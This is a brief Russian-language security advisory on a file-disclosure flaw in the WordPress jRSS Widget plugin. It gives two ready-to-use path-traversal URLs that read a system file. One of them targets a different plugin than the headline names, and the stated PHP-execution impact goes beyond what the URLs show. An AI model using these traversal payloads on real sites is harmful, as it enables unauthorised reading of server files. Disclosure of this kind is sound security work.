Программа: WordPress jRSS Widget Plugin 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Удаленный пользователь может получить содержимое
произвольных файлов на целевой системе.

Эксплоит:

http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini

http://localhost/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии